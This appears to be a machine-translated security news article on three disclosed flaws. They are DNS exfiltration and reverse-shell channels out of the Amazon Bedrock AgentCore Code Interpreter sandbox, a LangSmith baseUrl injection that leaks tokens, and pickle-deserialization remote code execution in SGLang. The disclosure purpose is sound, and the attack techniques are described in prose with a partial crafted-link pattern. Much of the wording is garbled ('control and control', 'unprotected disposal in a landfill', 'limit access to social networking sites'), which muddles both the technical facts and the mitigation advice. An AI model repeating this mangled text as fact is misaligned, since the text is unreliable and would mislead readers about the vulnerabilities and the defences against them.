AI Errors in Amazon Bedrock, LangSmith, and SGlang Enable Data Mining and RCE

Cybersecurity researchers have revealed details of a new method of extracting sensitive data from artificial intelligence (AI) code generators using domain name system (DNS) queries.
In a report published on Monday, BeyondTrust revealed that the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter allows outgoing DNS queries that an attacker can use to enable interactive shells and bypass network fragmentation. The issue, which does not have a CVE identifier, carries a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to execute code securely in isolated sandbox environments, such that agent workloads cannot access external systems. It was founded by Amazon in August 2025.
The fact that the service allows DNS queries despite the “no network access” configuration can allow “threat actors to establish channels of control and control and data extraction over DNS in certain cases, bypassing the expected network isolation controls,” said Kinnaird McQuade, chief security architect at BeyondTrust.
In an experimental attack scenario, a threat actor could abuse this behavior to establish a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, extract sensitive information via DNS queries if his IAM role has permissions to access AWS resources such as the S3 buckets that store that data, and execute a command operation.
In addition, the DNS communication method can be misused to bring additional payloads provided by the Code Interpreter, which makes it poll the control and control DNS server (C2) to receive the commands stored in the DNS records A, execute them, and return the results with DNS subdomain queries.
It’s worth noting that Code Interpreter requires an IAM role to access AWS services. However, simple monitoring can cause an overly privileged role to be assigned to a service, giving it broad permissions to access sensitive data.
“This study shows how DNS resolution can undermine network isolation guarantees for sandboxed code translators,” BeyondTrust said. “Using this method, attackers could have extracted sensitive data from AWS services accessible through the Code Interpreter’s IAM role, potentially causing downtime, a data breach of sensitive customer information, or compromised infrastructure.”

After the responsible disclosure in September 2025, Amazon decided that it is intended to work instead of having a problem, urging customers to use VPC mode instead of sandbox mode to isolate the network completely. The tech giant also recommends using a DNS firewall to filter outbound DNS traffic.

“To protect critical workloads, administrators should document all active AgentCore Code Interpreter instances and quickly migrate those handling critical data from Sandbox mode to VPC mode,” said Jason Soroko, CEO at Sectigo.
“Working within a VPC provides the necessary infrastructure for strong network isolation, allowing teams to use strong security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and prevent unauthorized DNS resolution. Finally, security teams should carefully examine the IAM roles attached to these interpreters, strictly enforcing the no-nonsense policy in the event of a potential explosion.”
LangSmith Risks Miscalculation
This disclosure comes as Miggo Security disclosed a critical security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover. The issue, which affects both self-hosted and cloud deployments, was addressed in LangSmith version 0.12.71 released in December 2025.
The flaw was identified as URL parameter injection stemming from a lack of authentication in the baseUrl parameter, which allows an attacker to steal a logged-in user’s administrator token, user ID, and workstation ID sent to a server under their control through social engineering techniques such as tricking the victim into clicking a specially crafted link as below –
- Cloud – smith.langchain[.]com/studio/?baseUrl=
- hold your own –
/studio/?baseUrl=
Successful exploitation of the vulnerability could allow an attacker to gain unauthorized access to AI tracking history, and expose internal SQL queries, CRM customer records, or source code by reviewing tool calls.
“A logged-in LangSmith user can only be compromised by accessing a site controlled by an attacker or by clicking on a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.

“This vulnerability is a reminder that AI visualization platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often unknowingly bypass security boundaries. This vulnerability is compounded because, like ‘traditional’ software, AI Agents have deep access to internal data sources and third-party services.”
Pickle Deserialization Unsafe Errors in SGlang
A security vulnerability has also been flagged in SGLang, a popular open-source framework for using large-scale language models and multimodal AI models, which, if successfully exploited, can trigger insecure pickle execution, which could result in remote code execution.
The vulnerability, discovered by Orca security researcher Igor Stepansky, remains unpublished as of writing. A brief description of the errors is as follows –
- CVE-2026-3059 (CVSS score: 9.8) – An unauthorized remote code execution vulnerability through the ZeroMQ vendor (also known as ZMQ), which removes untrusted data using pickle.loads() without authentication. It affects SGlang’s multimodal production module.
- CVE-2026-3060 (CVSS score: 9.8) – An unauthorized remote code execution vulnerability through the partitioning module, which removes untrusted data using pickle.loads() without authentication. It affects the relative classification system of the SGlang encoder.
- CVE-2026-3989 (CVSS score: 7.8) – Use of insecure pickle.load() function without authentication and proper output in SGLang’s “replay_request_dump.py”, which could be used to provide a malicious flooding file.
“The first two allow unauthorized remote code execution against any SGLang deployment that exposes its multimodal production or network isolation features,” Stepansky said. “The third involves unprotected disposal in a landfill.”
In a joint advisory, the CERT Coordination Center (CERT/CC) said SGLang is vulnerable to CVE-2026-3059 when the multimodal generation scheme is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation scheme is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, he can exploit the vulnerability by sending a malicious payload file to the broker, which will kill it,” CERT/CC said.
SGlang users are recommended to limit access to social networking sites and ensure they are not exposed to untrusted networks. It is also advised to implement adequate network segmentation and access controls to prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that this vulnerability has been exploited in the wild, it is important to monitor unexpected TCP connections entering the ZeroMQ vendor port, unexpected child processes created by the SGLang Python process, file creation in unusual locations by the SGLang process, and outgoing connections from unexpected locations to the SGLang process.



